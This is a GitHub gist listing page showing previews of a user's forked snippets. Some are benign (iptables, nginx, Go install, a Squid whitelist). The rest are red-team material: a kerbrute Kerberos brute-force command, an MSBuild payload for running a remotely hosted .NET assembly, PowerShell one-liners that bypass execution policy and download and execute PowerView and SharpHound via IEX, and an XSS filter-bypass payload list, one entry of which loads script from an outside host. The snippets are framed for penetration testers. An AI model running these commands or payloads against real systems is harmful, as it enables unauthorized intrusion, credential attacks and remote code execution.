Skip to content

Instantly share code, notes, and snippets.

View nixwizard's full-sized avatar

nixwizard

2 followers · 2 following
View GitHub Profile
@nixwizard
nixwizard / kerberos_attacks_cheatsheet.md
Created February 12, 2022 09:10 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@nixwizard
nixwizard / iptables-cheatsheet.md
Created September 25, 2021 12:48 — forked from egernst/iptables-cheatsheet.md
iptables-cheatsheet

The netfilter hooks in the kernel and where they hook in the packet flow

The figure below calls out

  • The netfilter hooks
  • The order of table traversal
@nixwizard
nixwizard / msBuildDemo.xml
Created July 22, 2021 15:48 — forked from G0ldenGunSec/msBuildDemo.xml
MSBuild payload used to execute a remotely-hosted .net assembly
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="DemoClass">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
@nixwizard
nixwizard / README.md
Created March 29, 2021 10:26 — forked from nmarley/README.md
Go fresh install Ubuntu 18.04

Go install using gvm on fresh Ubuntu instance

Install

Using a fresh Ubuntu 18.04 (latest LTS) install:

# Install prerequisites
sudo apt update
sudo apt install -y bison binutils gcc make
@nixwizard
nixwizard / nginx.conf
Created July 13, 2020 09:52 — forked from jrom/nginx.conf
nginx hack for multiple conditions
if ($request_uri = /) {
set $test A;
}
if ($host ~* teambox.com) {
set $test "${test}B";
}
if ($http_cookie !~* "auth_token") {
set $test "${test}C";
@nixwizard
nixwizard / 01nginx-tls-sni.md
Created May 1, 2020 19:26 — forked from kekru/01nginx-tls-sni.md
nginx TLS SNI routing, based on subdomain pattern

Nginx TLS SNI routing, based on subdomain pattern

Nginx can be configured to route to a backend, based on the server's domain name, which is included in the SSL/TLS handshake (Server Name Indication, SNI).
This works for http upstream servers, but also for other protocols, that can be secured with TLS.

prerequisites

  • at least nginx 1.15.9 to use variables in ssl_certificate and ssl_certificate_key.
  • check nginx -V for the following: 
    ...
TLS SNI support enabled
@nixwizard
nixwizard / RedTeam_CheatSheet.ps1
Created February 20, 2020 15:11 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@nixwizard
nixwizard / disable-xss-auditor.sh
Created November 2, 2018 08:41 — forked from mbijon/disable-xss-auditor.sh
CLI command to start Chrome with XSS Auditor disabled. Use for XSS/security testing
'/Applications/Google Chrome.app/Contents/MacOS/Google Chrome' --disable-xss-auditor --enable-devtools-experiments --disable-features=enable-automatic-password-saving
@nixwizard
nixwizard / squid-whitelist.acl
Created February 27, 2018 12:18 — forked from hermesthecat/squid-whitelist.acl
A squid proxy whitelist to get started. Allows all Office 365 and windows updates through proxy.
# PUT IN ALPHABETICAL ORDER
.aadrm.com
.activedirectory.windowsazure.com
.adhybridhealth.azure.com
.ajax.aspnetcdn.com
.ajax.googleapis.com
# .amazon.com
# .amazonaws.com
.appex.bing.com
.appex-rf.msn.com
@nixwizard
nixwizard / xxsfilterbypass.lst
Created February 21, 2018 15:01 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>